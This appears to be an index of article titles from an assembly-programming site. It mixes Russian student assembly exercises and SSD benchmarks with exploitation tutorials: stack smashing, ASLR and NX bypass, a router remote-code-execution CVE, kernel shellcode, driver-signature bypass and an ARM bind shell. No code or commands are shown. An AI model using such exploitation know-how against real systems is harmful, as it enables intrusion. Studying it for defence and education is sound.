- Process Injection with GDB
- Bypass ASLR+NX Part 1
- Best SSDs: Q2 2018
- SSD 2017 SSD 2017 Benchmarks
- REMOTE CODE EXECUTION ROP,NX,ASLR (CVE-2018-5767) Tenda’s AC15 router
- 64-bit Linux stack smashing tutorial: Part 3
- 64-bit Linux stack smashing tutorial: Part 2
- 64-bit Linux stack smashing tutorial: Part 1
- Shellcoding for Linux and Windows Tutorial
- Shellcodes database
- Windows x64 kernel shellcode from ring 0 to ring 3
- How to convert Windows API declarations in VBA for 64-bit
- A Tool To Bypass Windows x64 Driver Signature Enforcement
- Tracing Objective-C method calls
- MS16-039 — «Windows 10» 64 bits Integer Overflow exploitation by using GDI objects
- Derandomization of ASLR on any modern processors using JavaScript
- TCP Bind Shell in Assembly (ARM 32-bit)
- ARM LAB ENVIRONMENT
- ARM PROCESS MEMORY AND MEMORY CORRUPTIONS
- ARM DEBUGGING WITH GDB
- RASPBERRY PI ON QEMU
- ARM ASSEMBLY BASICS
- WRITING ARM SHELLCODE
- AVX — Advanced Vector Extensions are extensions to the x86 instruction set architecture for microprocessors from Intel and AMD
- SSE4 — CPU instruction set used in the Intel Core microarchitecture and AMD
- Intel CPU security features
- Basic Practices in Assembly Language Programming
- Assembler & Win32
- О регистрах в assembler
- Как узнать сеpийный номеp, тип IDE винта?
- Система команд процессоров Intel
- Взаимодействие с GLIBC
- Своя маленькая операционная система
- Пишем свой загрузочный сектор
- Проверка готовности накопителя
- Рисуем пиксел в графическом режиме
- Пишем напрямую в видеопамять
- Рисование в SVGA
- TSR: Завершаемся и остаемся в памяти
- Чтение параметров командной строки
- Таблица размещения файлов FAT
- Линейные преобразования в системах с фиксированной точкой
- Установка видеорежимов VGA
- Asm: Определяем тип процессора
- Asm: Чтение значения счетчика времени
- Перевод чисел в двоичную форму (в виде строки)
- Процедура считывает строку с клавиатуры
- Задание выполняется на Visual C++ 2003 — 2008 с использованием assembler вставок. В этом задании необходимо выполнить соответствующие преобразования над строкой или строками.
- Ассемблер сопроцессор: Вычислить 4 значения функции: Y = 3 * log2(x2+1), x изменяется от 0,2 с шагом 0,3.
- Ассемблер сопроцессор: Определить номер (х) элемента функции: xn = 3х + 5, при котором сумма элементов превысит 12 000. Результат разместить в памяти и вывести соответствующие сообщения.
- Ассемблер сопроцессор: Вычислить 6 значений функции: Yn = 4x/(x + 5) (х изменяется от 3 с шагом 1,25). Результат округлить к целому, разместить в памяти и вывести на экран.
- Dll на ассемблере: Написать программу на ассемблер. Задан массив А из N = 40 элементов. Навести алгоритм и программу определения количества элементов массива А, которые удовлетворяют условию L >= Ai >= M, где L = 6 и M = 22.
- Написать программу с использованием макросов для вычисления одного из выражений без предыдущего математического упрощения операций: 2x – 3 + 8(2x –3);
- Проанализировать массив данных из 16 элементов. Подсчитать и вывести на экран количество элементов, которые по значению находятся в середине диапазона от 32 до 128.
- Заданы массивы A и В из N = 8 элементов. Сформировать новый массив С по правилу: если у элементов Ai и Bi биты 0, 1 и 2 совпадают, то Ci = Аi + Вi.
- Арифметические выражения через команды: mul, div, sub, add. Пример: Написать программу на ассемблере вычисления выражения: а – e/b – de;
- Написать программу на Ассемблере вычисления выражений: b/c + ас. Результат вычисления выражения сохранить в памяти. Навести значение и порядок размещения данные в памяти.
- Матрица 3 X 4. Определить максимальный элемент каждой строки. Результат выполнения программы вывести в окно консоли.
- Вывод данных в файл: для функции Y = 40Х + 10 получить первое значение, превышающей 512, начиная с Х = 1. Значение аргумента и функции записать в ячейки памяти.
- Задано матрицу 3 х 6. Определить элементы кратные 3 в каждой строке и поместить на их место элемент, номер которого совпадает с номером строки. Результат выполнения программы вывести в окно консоли.
- Ввести двумерный массив размером 6х4. Найти максимальный элемент двумерного массива. Перенести строку, содержащую этот элемент, в конец.
- Ввести двумерный массив А (N, N). Составить алгоритм и программу подсчета среднего арифметического значений двумерного массива. Найти отклонения от среднего в элементов первой строки.
- Задано массивы А и В по N = 30 элементов. Привести алгоритм и программу формирования массива С по правилу: если в элементов Аi и Вi биты 4 и 9 совпадают, то Сi = Аi + Вi. Вывести соответствующие сообщения.
- Задано текст из 32 символов, состоящий из слов, разделенных одним пробелом. Определить количество слов и количество согласных букв в каждом слове.
- Задано текст из 30 символов. Сжать текст, оставив между словами по одному пропуску.
- Вычисление с выводом данных в окно консоли: Задано массив А из N = 4 элементов. Написать программу определения суммы элементов массива А, для которых биты 0 и 5 совпадают.
- Ввести 2 дробных числа и сложить их и вывести на консоль и в MessageBox.
- Программа расчета формулы в языке Ассемблер. Формула имеет вид: D = 4*Pi*Ha*Fi*D0/L
Code depilation salon